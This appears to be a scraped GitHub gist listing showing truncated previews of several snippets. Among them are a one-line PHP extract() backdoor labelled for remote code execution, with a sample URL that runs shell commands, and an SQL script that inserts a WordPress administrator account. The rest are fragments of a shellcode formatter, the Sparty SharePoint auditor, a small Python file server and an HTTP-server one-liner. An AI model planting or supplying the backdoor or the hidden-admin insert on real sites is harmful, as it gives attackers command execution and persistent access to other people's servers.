Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
iamtutu iamtutu
leonjza
/ backup.php
Last active
August 18, 2020 15:10
PHP extract() Backdoor RCE | Sample usage: foo.bar/backup.php?ctime=system&atime=ls -lah
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php extract($_REQUEST); @die($ctime($atime)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
azizur
/ create-wp-admin-account.sql
Last active
September 28, 2021 15:39
Create a WordPress Administrator user account using SQL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| USE __DATABASE__; | |
| SET @username = 'azizur'; | |
| SET @password = MD5('password'); | |
| SET @fullname = 'Azizur Rahman'; | |
| SET @email = '[email protected]'; | |
| SET @url = 'http://azizur.com/'; | |
| INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) VALUES (@username, @password, @fullname, @email, @url, NOW(), '0', @fullname); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Sparty - Sharepoint/Frontend Auditor | |
| # By: Aditya K Sood - SecNiche Security Labs ! (c) 2013 | |
| license = """ | |
| Copyright (c) 2013, {Aditya K sood} | |
| All rights reserved. | |
| Redistribution and use in source and binary forms, with or without modification, | |
| are permitted provided that the following conditions are met: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # coding: utf-8 | |
| import os,socket,threading,time | |
| #import traceback | |
| allow_delete = False | |
| local_ip = socket.gethostbyname(socket.gethostname()) | |
| local_port = 8888 | |
| currdir=os.path.abspath('.') |
NewerOlder